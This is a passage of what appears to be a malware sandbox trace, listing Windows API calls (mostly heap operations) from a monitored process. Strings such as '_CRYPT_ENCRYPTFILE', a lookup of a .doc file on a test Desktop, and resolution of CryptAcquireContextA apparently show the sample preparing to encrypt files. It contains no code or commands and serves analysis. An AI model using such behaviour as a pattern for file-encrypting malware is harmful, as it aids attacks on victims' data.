hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0129.971] FreeLibrary (hLibModule=0x772d0000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0129.972] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0129.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0129.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0129.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0129.972] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0129.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0129.973] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.974] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afc3bf0, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0x36306f20, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x36306f20, ftLastWriteTime.dwHighDateTime=0x1d5f088, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="5qUH.doc", cAlternateFileName="")) returned 0x41ac640 [0129.974] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.975] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.975] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.975] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.976] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.976] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.977] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0129.977] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.977] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.977] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0129.979] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0129.980] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: 